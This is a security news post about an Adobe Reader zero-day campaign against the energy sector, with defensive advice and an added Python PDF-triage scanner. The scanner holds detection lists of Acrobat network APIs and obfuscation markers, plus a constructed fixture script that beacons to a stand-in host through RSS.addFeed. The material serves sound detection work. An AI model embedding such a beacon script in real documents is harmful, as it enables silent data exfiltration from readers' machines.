Code Defence Cyber security

Adobe Reader zero-day exploit used in months-long campaign targeting energy sector

A sophisticated zero-day vulnerability in Adobe Reader is being leveraged in a targeted campaign that has remained undetected since at least December 2025. The attack utilizes high-fidelity document lures related to the Russian oil and gas industry to achieve silent code execution on victim endpoints.

The exploit targets the JavaScript engine within Adobe Reader, utilizing privileged APIs to access and exfiltrate local system data. Researchers have observed the exploit calling the RSS.addFeed() function to beacon stolen information back to actor-controlled infrastructure. The use of specific industry lures suggests a state-sponsored or advanced persistent threat actor focused on industrial espionage.

Targeting document readers is an effective way to bypass perimeter defenses because PDFs are a fundamental component of business communication. When combined with a zero-day exploit and sector-specific social engineering, the likelihood of a successful initial intrusion rises sharply.

– Monitor for an official security update from Adobe and apply it to all Acrobat and Reader instances immediately upon release.

– Implement automated scanning of PDF attachments and block files containing obfuscated JavaScript or unauthorized API calls.

– Train users to be wary of unsolicited PDF documents, even when they appear to relate to relevant industry topics.

– Utilize EDR to monitor for anomalous network connections originating from PDF reader processes.
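As an added example of the attachment-scanning recommendation above (this is illustrative code written here, not code from Code Defence or Adobe), the script below performs a first-pass triage of a PDF: it inflates FlateDecode streams, undoes PDF name escaping and hex-string encoding, then flags script-bearing names, a watchlist of Acrobat JavaScript APIs (RSS.addFeed is the one named in the report; the other entries are an assumed watchlist) and common obfuscation markers, and returns a block/review/allow verdict. The sample PDFs it builds are constructed fixtures, not documents from the campaign.

```python
import re
import zlib

# PDF names that carry script or fire it automatically on open. The \b keeps a short
# name such as /AA from matching inside base64 or binary runs.
SCRIPT_KEYS = [rb"/JavaScript\b", rb"/JS\b", rb"/OpenAction\b", rb"/AA\b"]

# Acrobat JavaScript APIs an ordinary business document has no reason to call.
# RSS.addFeed is the call named in the report; the rest are an assumed watchlist of
# other documented network/launch APIs, not something taken from the campaign.
SUSPICIOUS_APIS = [rb"RSS\.addFeed", rb"app\.launchURL", rb"\.submitForm\s*\(",
                   rb"Net\.HTTP\.request", rb"SOAP\.connect"]

# Cheap obfuscation tells: dynamic evaluation, escape decoding, long \xNN or %uNNNN runs.
OBFUSCATION_MARKERS = [rb"\beval\s*\(", rb"\bunescape\s*\(", rb"String\.fromCharCode",
                       rb"(?:\\x[0-9A-Fa-f]{2}){8,}", rb"(?:%u[0-9A-Fa-f]{4}){4,}"]

# Constructed detection fixture (not a real campaign sample): a script that decodes its
# destination and hands it to the API the report names.
LURE_SCRIPT = b'var t = unescape("%68ttps://collector.example.invalid/feed"); RSS.addFeed(t);'


def _inflate_streams(data: bytes) -> bytes:
    """Append the inflated content of every zlib (FlateDecode) stream so script hidden
    behind compression is scanned too; bodies that are not zlib data are skipped."""
    chunks = [data]
    for m in re.finditer(rb"stream\r?\n(.*?)endstream", data, re.DOTALL):
        try:
            chunks.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass
    return b"\n".join(chunks)


def _unescape_names(data: bytes) -> bytes:
    """Undo PDF name escaping (/J#61vaScript -> /JavaScript), a common grep-evasion trick."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def _decode_hex_strings(data: bytes) -> bytes:
    """Append decoded PDF hex strings (<4A53> is 'JS') so literals hidden in hex are scanned."""
    decoded = []
    for m in re.finditer(rb"<([0-9A-Fa-f\s]{2,})>", data):
        digits = re.sub(rb"\s", b"", m.group(1))
        if len(digits) % 2:
            digits += b"0"  # PDF treats a missing final digit as 0
        decoded.append(bytes.fromhex(digits.decode("ascii")))
    return data + b"\n" + b"\n".join(decoded)


def scan_pdf_bytes(data: bytes) -> dict:
    """Return matched indicators plus a verdict: block, review or allow."""
    text = _decode_hex_strings(_unescape_names(_inflate_streams(data)))

    def hits(patterns):
        return sorted({m.group(0).decode("latin-1")
                       for p in patterns for m in re.finditer(p, text)})

    findings = {"script_keys": hits(SCRIPT_KEYS),
                "suspicious_apis": hits(SUSPICIOUS_APIS),
                "obfuscation": hits(OBFUSCATION_MARKERS)}
    if findings["suspicious_apis"] or findings["obfuscation"]:
        findings["verdict"] = "block"    # unauthorized API or obfuscation: quarantine
    elif findings["script_keys"]:
        findings["verdict"] = "review"   # script present but nothing flagged: analyst triage
    else:
        findings["verdict"] = "allow"
    return findings


def build_sample_pdf(script: bytes = b"", compress: bool = False) -> bytes:
    """Constructed fixture: a minimal PDF that auto-runs `script` via /OpenAction, or
    carries only a plain page content stream when no script is given."""
    payload = script or b"BT /F1 12 Tf (Quarterly report) Tj ET"
    body = zlib.compress(payload) if compress else payload
    filt = b"/Filter /FlateDecode " if compress else b""
    parts = [b"%PDF-1.7\n",
             b"1 0 obj << /Type /Catalog /Pages 2 0 R ",
             b"/OpenAction 4 0 R " if script else b"", b">> endobj\n",
             b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
             b"3 0 obj << /Type /Page /Parent 2 0 R /Contents 5 0 R >> endobj\n",
             b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n" if script else b"",
             b"5 0 obj << /Length %d %s>>\nstream\n" % (len(body), filt),
             body, b"\nendstream\nendobj\n",
             b"trailer << /Root 1 0 R >>\n%%EOF\n"]
    return b"".join(parts)


if __name__ == "__main__":
    for label, pdf in [("lure", build_sample_pdf(LURE_SCRIPT, compress=True)),
                       ("plain", build_sample_pdf()),
                       ("benign_js", build_sample_pdf(b'app.alert("Welcome");'))]:
        print(label, scan_pdf_bytes(pdf))
```

The three-tier verdict is deliberate: a document that merely contains JavaScript lands in "review" rather than being dropped silently, because legitimate forms use scripting, while any hit on the API watchlist or an obfuscation marker is enough to quarantine. Decoding compressed streams, escaped names and hex strings before matching is what separates this from a plain grep for `/JavaScript`, which is the first thing a lure author tests against. The check is a triage layer in front of the mail gateway, not a replacement for the vendor patch.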

The persistence of this zero-day highlights the strategic value of targeting core productivity software with tailored industry intelligence. #CodeDefence #Adobe #ZeroDay #IndustrialEspionage